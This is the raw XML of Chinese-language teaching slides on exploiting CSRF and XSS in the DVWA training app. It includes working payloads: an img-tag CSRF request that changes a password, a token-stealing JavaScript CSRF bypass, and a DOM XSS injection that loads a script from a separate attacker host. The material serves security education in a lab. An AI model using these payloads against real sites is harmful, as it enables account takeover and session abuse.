                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>://www.owasp.org/index.php/Types_of_Cross-Site_Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2700" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="235536" y="1914517"/>
            <a:ext cx="1382078" cy="1193075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="圖片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2021112" y="1759132"/>
            <a:ext cx="6765073" cy="5041037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="174575" y="3327793"/>
            <a:ext cx="1707199" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本次課程會</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>平台</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的這三種類型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235536" y="4748323"/>
            <a:ext cx="1338828" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>請參考上述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>網站的說明</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78512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0" y="315632"/>
            <a:ext cx="9144000" cy="1035305"/>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DVWA_1.10_Medium</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="圖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50937"/>
            <a:ext cx="5172075" cy="3829050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="內容版面配置區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059675" y="3517336"/>
            <a:ext cx="4584818" cy="2697956"/>
          </a:xfrm>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059675" y="5438251"/>
            <a:ext cx="4922372" cy="113107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pt-BR" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>&lt;img src="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.250</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>/DVWA/vulnerabilities/csrf/?password_new=ksu123456&amp;password_conf=ksu123456&amp;Change=Change#" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" altLang="zh-TW" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>&lt;h1&gt;CSRF Demo&lt;h1&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059675" y="5138169"/>
            <a:ext cx="884922"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CSRF.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733818" y="3218556"/>
            <a:ext cx="4410182"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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>192.168.2.53為被置入CSRF攻擊語法的主機</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3125995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0" y="315632"/>
            <a:ext cx="9144000" cy="1035305"/>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DVWA_1.10_Medium</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="內容版面配置區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075" y="1528001"/>
            <a:ext cx="3065597" cy="1803964"/>
          </a:xfrm>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="圖片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="45539"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325562" y="2049437"/>
            <a:ext cx="4935537" cy="4098910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1820423" y="4622564"/>
            <a:ext cx="1125977" cy="221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11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2611993" y="5274891"/>
            <a:ext cx="1125977" cy="221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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="圖片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="46354"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4188445" y="2049437"/>
            <a:ext cx="4955555" cy="4137823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5474876" y="5249491"/>
            <a:ext cx="1125977" cy="2211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
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1317032" y="6360914"/>
            <a:ext cx="592196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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>Medium等級檢查了HTTP標頭的Referer參數,須包含本機IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="向右箭號 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3958853" y="5119828"/>
            <a:ext cx="927279" cy="53125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350"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1868998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0" y="315632"/>
            <a:ext cx="9144000" cy="1035305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="5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DVWA_1.10_Medium</a:t>
            </a:r>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525" y="1631950"/>
            <a:ext cx="6991350" cy="5010150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3395196" y="4137025"/>
            <a:ext cx="3547766"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受CSRF攻擊，需使用密碼ksu123456才能登入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23673330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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1035305"/>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endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3787745" y="1682819"/>
            <a:ext cx="4179349" cy="646331"/>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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>192.168.2.79</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>192</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>.168.2.53</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>SRF攻擊語法的主機</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="圖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070" y="2387623"/>
            <a:ext cx="4542076" cy="4105916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1630669"/>
            <a:ext cx="3721070" cy="486287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TW" altLang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>var theUrl = 'http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.2.79</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>/DVWA/vulnerabilities/csrf/';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    var pass = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xssattack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    if (window.XMLHttpRequest){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>        xmlhttp=new XMLHttpRequest();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    }else{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>        xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    xmlhttp.withCredentials = true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    var hacked = false;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    xmlhttp.onreadystatechange=function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>        if (xmlhttp.readyState==4 &amp;&amp; xmlhttp.status==200)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>        {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>            var text = xmlhttp.responseText;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>            var regex = /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>\' value\=\'(.*?)\' \/\&gt;/;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>            var match = text.match(regex);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>            var token = match[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>            var new_url = 'http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.2.79</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>/DVWA/vulnerabilities/csrf/?user_token='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>+'&amp;password_new='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>+'&amp;password_conf='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>+'&amp;Change=Change'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>            if(!hacked){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>                alert('Got token:' + match[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>                hacked = true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>                xmlhttp.open("GET", new_url, false );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>                xmlhttp.send();  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    xmlhttp.open("GET", theUrl, false );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    xmlhttp.send();  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3619499" y="4914811"/>
            <a:ext cx="5400675" cy="784830"/>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TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>要繞過high等級的CSRF防護機制，需要確竊取受害者的cookie去修改密碼的頁面獲取token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>還需</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>搭配high等級的DOM Based XSS才能完成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1362815"/>
            <a:ext cx="4876800" cy="24622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sz="1000" dirty="0"/>
              <a:t>https://github.com/hoainam1989/training-application-security/blob/master/csrf/high.js</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="883583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rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="38464" t="39161" r="24599" b="1826"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4361674"/>
            <a:ext cx="4087586" cy="2364719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="標題 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1035305"/>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endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="圖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57" y="1475222"/>
            <a:ext cx="6983950" cy="2844613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4734254"/>
            <a:ext cx="6858000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>default=English</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#&lt;script src="http://192.168.2.53/xss.js"&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="向下箭號 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7082971" y="4156089"/>
            <a:ext cx="566058" cy="70619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818749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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1035305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060"/>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DVWA_1.10_HIGH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
